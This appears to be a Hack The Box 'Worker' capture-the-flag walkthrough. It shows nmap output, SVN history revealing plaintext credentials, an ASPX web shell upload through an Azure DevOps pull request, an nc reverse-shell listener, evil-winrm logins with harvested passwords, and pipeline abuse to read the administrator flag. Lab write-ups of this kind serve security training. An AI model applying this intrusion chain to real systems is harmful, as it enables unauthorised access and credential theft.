NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 17:11 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating Ping Scan at 17:11
Scanning 10.10.10.203 [4 ports]
Completed Ping Scan at 17:11, 0.44s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 17:11
Scanning alpha.worker.htb (10.10.10.203) [1000 ports]
Discovered open port 80/tcp on 10.10.10.203
Discovered open port 3690/tcp on 10.10.10.203
Completed SYN Stealth Scan at 17:11, 25.11s elapsed (1000 total ports)
Initiating Service scan at 17:11
Scanning 2 services on alpha.worker.htb (10.10.10.203)
Completed Service scan at 17:11, 6.86s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against alpha.worker.htb (10.10.10.203)
Retrying OS detection (try #2) against alpha.worker.htb (10.10.10.203)
Initiating Traceroute at 17:11
Completed Traceroute at 17:11, 0.52s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 17:11
Completed Parallel DNS resolution of 2 hosts. at 17:11, 0.25s elapsed
NSE: Script scanning 10.10.10.203.
Initiating NSE at 17:11
Completed NSE at 17:11, 7.69s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 1.84s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Nmap scan report for alpha.worker.htb (10.10.10.203)
Host is up (0.43s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Alpha by HTML5 UP
3690/tcp open svnserve Subversion
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 507.46 ms 10.10.14.1
2 507.71 ms alpha.worker.htb (10.10.10.203)
NSE: Script Post-scanning.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.67 seconds
Raw packets sent: 2097 (95.952KB) | Rcvd: 49 (3.178KB)
PORT 80
Here we have nothing but IIS
SVN ENUMERATION
AS we can see that we have PORT 3690 which is svn port which we need to use to enumerate so lets dig into it
Firstly that svn is kind off similar to git which mean that as we use git command to clone push repos similarly we can use svn but with changed keywords!!
Here in above links you can take help to clone repo
So lets clone with basic command
┌─[root@liquid]─[~/Desktop/HTB/worker] └──╼ #svn checkout svn://10.10.10.203 Restored 'dimension.worker.htb' Restored 'dimension.worker.htb/images' Restored 'dimension.worker.htb/images/pic03.jpg' Restored 'dimension.worker.htb/images/overlay.png' Restored 'dimension.worker.htb/images/bg.jpg' <--------> 'dimension.worker.htb/assets/sass/libs/_breakpoints.scss' Checked out revision 5.
Here above we have cloned repo so after enumerating we got only subdomains
Now we will clone using other revision
what revision is the kind off freshly created repo as first one will have 0 number 2nd one will have 1 number
So lets see how it works
┌─[✗]─[root@liquid]─[~/Desktop/HTB/worker/dimension] └──╼ #svn checkout -r 2 svn://10.10.10.203 A deploy.ps1 A dimension.worker.htb A dimension.worker.htb/LICENSE.txt A dimension.worker.htb/README.txt A dimension.worker.htb/assets A dimension.worker.htb/assets/css A dimension.worker.htb/assets/css/fontawesome-all.min.css A dimension.worker.htb/assets/css/main.css A dimension.worker.htb/assets/css/noscript.css A dimension.worker.htb/assets/js <------>
Here we can see that we have some more files which were not their during latest repo So lets check that
┌─[✗]─[root@liquid]─[~/Desktop/HTB/worker/dimension]
└──╼ #cat deploy.ps1
$user = "nathen"
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
┌─[root@liquid]─[~/Desktop/HTB/worker/dimension]
Here we got some credentials
$user = “nathen”
$plain = “wendel98”
another way to dig between repo is to use command diff
During revision 1
┌─[root@liquid]─[~/Desktop/HTB/worker] └──╼ #svn diff -r 1 Index: moved.txt =================================================================== --- moved.txt (nonexistent) +++ moved.txt (revision 5) @@ -0,0 +1,5 @@ +This repository has been migrated and will no longer be maintaned here. +You can find the latest version at: http://devops.worker.htb + +// The Worker team :) +
During revision 2
┌─[root@liquid]─[~/Desktop/HTB/worker]
└──╼ #svn diff -r 2
Index: deploy.ps1
===================================================================
--- deploy.ps1 (revision 2)
+++ deploy.ps1 (nonexistent)
@@ -1,6 +0,0 @@
-$user = "nathen"
-$plain = "wendel98"
-$pwd = ($plain | ConvertTo-SecureString)
-$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
-$args = "Copy-Site.ps1"
-Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
Index: moved.txt
===================================================================
--- moved.txt (nonexistent)
+++ moved.txt (revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team :)
+
Here we can clearly see that we have a file named deploy.ps1
Lets Use those password to login to devops.worker.htb
DEVOPS.WORKER.HTB
nathen:wendel98
In this we can see that we have access to number of websites so lets upload shell to website and will trigger that by visiting that website
Shell which we will be uploading is aspx for web app exploit
https://github.com/puckiestyle/aspx/blob/master/InsomniaShell.aspx
So lets upload that
To upload we need to follow instruction as we cannot dorectly upload into master branch so we need to pull a branch first
Just click on branches and create a new one
After that upload a shell on it by clicking on to your branch
Then you will have a “create a pull request” option just click that
Then click on create
Then click on Approve Then Complete both buttons are side by side
Then complete merge
You are done!!
After some seconds just go access your shell
and create a reverse shell
You will get shell as this
┌─[root@liquid]─[~/Desktop/HTB/worker] └──╼ #rlwrap nc -lnvp 9008 listening on [any] 9008 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.203] 52441 Shell enroute....... Microsoft Windows [Version 10.0.17763.1282] (c) 2018 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>whoami whoami iis apppool\defaultapppool c:\windows\system32\inetsrv>powershell.exe powershell.exe Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\windows\system32\inetsrv>
Here after enumerating i came to know that i have no access to anything SO lets get all drives
PS C:\> Get-Volume
Get-Volume
DriveLetter FriendlyName FileSystemType DriveType HealthStatus OperationalStatus SizeRemaining Size
----------- ------------ -------------- --------- ------------ ----------------- ------------- ----
C NTFS Fixed Healthy OK 9.65 GB 29.4 GB
W Work NTFS Fixed Healthy OK 17.06 GB 20 GB
Recovery NTFS Fixed Healthy OK 118.04 MB 499 MB
So lets get into W:\
PS W:\> ls
ls
Directory: W:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2020-06-16 18:59 agents
d----- 2020-03-28 14:57 AzureDevOpsData
d----- 2020-04-03 11:31 sites
d----- 2020-06-20 16:04 svnrepos
PS W:\> cd svnrepos
cd svnrepos
PS W:\svnrepos> ls
ls
Directory: W:\svnrepos
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2020-06-20 11:29 www
PS W:\svnrepos> cd www
cls
d www
PS W:\svnrepos\www> ls
Directory: W:\svnrepos\www
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2020-06-20 15:30 conf
d----- 2020-06-20 15:52 db
d----- 2020-06-20 11:29 hooks
d----- 2020-06-20 11:29 locks
-ar--- 2020-06-20 11:29 2 format
-a---- 2020-06-20 11:29 251 README.txt
PS W:\svnrepos\www> cd conf
cd conf
PS W:\svnrepos\www\conf> ls
ls
Directory: W:\svnrepos\www\conf
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2020-06-20 11:29 1112 authz
-a---- 2020-06-20 11:29 904 hooks-env.tmpl
-a---- 2020-06-20 15:27 1031 passwd
-a---- 2020-04-04 20:51 4454 svnserve.conf
PS W:\svnrepos\www\conf> type passwd
type passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
<----->
Here we got number of passwords but we need valid ones so if you remember that we had a user named robisl so lets capture his password
robisl = wolves11
So lets use evil-winrm
USER ACCESS
┌─[root@liquid]─[~/Desktop/HTB/worker]
└──╼ #evil-winrm -u robisl -p wolves11 -i 10.10.10.203
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\robisl\Documents> whoami
worker\robisl
*Evil-WinRM* PS C:\Users\robisl\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> ls
Directory: C:\Users\robisl\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/22/2020 7:39 AM 34 user.txt
*Evil-WinRM* PS C:\Users\robisl\Desktop> type user.txt
16dfdc02fa843b51362d885c28d53a6d
Here we go with User FLag!!
Now Time to go For Administrator
ADMINISTRATOR ACCESS
So after checking files we will see that we have no access to any priv file
So lets use this creds in devops.worker.htb
And we will get in
Here we go So lets check if we have any repo
But as you can see we have no repo website
But we can create Pipeline
So lets create a new one
Instructions To Follow
Create new pipeline
Click Azure Repos Git
Then Click PartsUnlimited
Now if you scroll down you will have Starter Pipeline just click on that
Just remove everything and Paste this down
steps: - script: whoami /all displayName: 'Run a one-line script'
Then just save and run then create a new branch by giving out random name and then again save and run
Here you can see that we are administrator
So lets get ROOT FLAG
Just create a new pipeline again and follow the above steps but paste this code
steps: - script: type c:\Users\Administrator\Desktop\root.txt displayName: 'Run a one-line script'
Just wait and Get your root flag
So here you go with root flag!!
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
